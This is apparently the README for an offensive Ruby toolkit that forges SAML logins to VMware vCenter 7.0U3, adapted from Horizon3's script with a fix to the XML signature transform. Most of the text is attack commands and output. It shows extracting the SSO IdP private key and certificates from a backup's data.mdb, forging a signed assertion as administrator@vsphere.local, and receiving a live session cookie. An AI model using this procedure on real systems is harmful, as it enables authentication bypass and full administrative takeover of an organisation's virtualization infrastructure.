vCenter Forge SAML

This is tested on vCenter 7.0U3, based on horizon3 vcenter_saml_login.

Their script didn't work out of the box for me, and it seems like the error is in the signing of the SAML as the <ec:InclusiveNamespaces..> is missing. 

## Horizon3's signed XML
<ds:Transforms>
    <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
    <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>

## My signed XML
<ds:Transforms>
    <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
    <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#">
        <ec:InclusiveNamespaces xmlns:ec="http://www.w3.org/2001/10/xml-exc-c14n#" PrefixList="xsd xsi"/>
    </ds:Transform>
</ds:Transforms>
## Download data.mdb from vCSA backup. (Usually in lotus_backup.tar.gz)
$ ls -al
-rw-rw-r-- 1 void void     6134 Dec  4 09:33 assert.xml.erb
-rw------- 1 void void 40910848 Dec  4 13:20 data.mdb
-rw-rw-r-- 1 void void    12072 Dec  5 08:51 vcenter_forge_saml.rb
-rw-rw-r-- 1 void void     4702 Dec  5 08:51 vcenter_mdb_extractor.rb

## Execute 'vcenter_mdb_extractor.rb' to extract key and certs.
$ ruby vcenter_mdb_extractor.rb -h
Usage: vcenter_mdb_extractor [options]
    -d, --mdb /path/to/data.mdb

$ ruby vcenter_mdb_extractor.rb --mdb data.mdb
[+] Extracting from file: data.mdb
[+] Extracting vCenter SSO IdP Private key
[+] Extracting vCenter SSO IdP certificate
[+] Extracting vCenter VMCA root certificate
[+] Extraction done, output writen to ./output

$ ls -al ./output 
total 20
drwxrwxr-x 2 void void 4096 Dec  5 08:51 .
drwxrwxr-x 3 void void 4096 Dec  5 08:51 ..
-rw-rw-r-- 1 void void 1679 Dec  5 08:51 idp_cert.key
-rw-rw-r-- 1 void void 1318 Dec  5 08:51 idp_cert.pem
-rw-rw-r-- 1 void void 1468 Dec  5 08:51 vmca_cert.pem

## Execute 'vcenter_forge_saml.rb' to forge a SAML Request
$ ruby vcenter_forge_saml.rb -h
Usage: vcenter_forge_saml [options]
    -f, --fqdn <fqdn>                (Required) vCenter FQDN/Hostname
    -k, --key idp_cert.key           vCenter SSO IdP Private key. Default: ./output/idp_cert.key
    -c, --cert idp_cert.pem          vCenter SSO IdP certificate. Default: ./output/idp_cert.pem
    -v, --vmca vmca_cert.pem         vCenter VMCA root certificate. Default: ./output/vmca_cert.pem
    -u, --user username              vCenter Username to impersonate. Default: administrator
    -d, --domain domain              vCenter domain. Default: vsphere.local

$ ruby vcenter_forge_saml.rb --fqdn vcenter.target.local
Forgin SAML Request for 'administrator@vsphere.local' on 'vcenter.target.local'.
 [+] Validated FQDN: vcenter.target.local
 [+] Validated SSO IdP trusted certificate chain
 [+] Generated SAML response XML
 [+] Extracted RelayState: e044eb6b-d5d5-48f5-8843-4f83e5f48afe
 [+] Signed SAML assertion
 [+] Successfully authenticated to vSphere/vCenter!
 [+] Session cookie: VSPHERE-UI-JSESSIONID=84D394608A08CE9E11532F2B6A5BDB91; Path=/ui

Last updated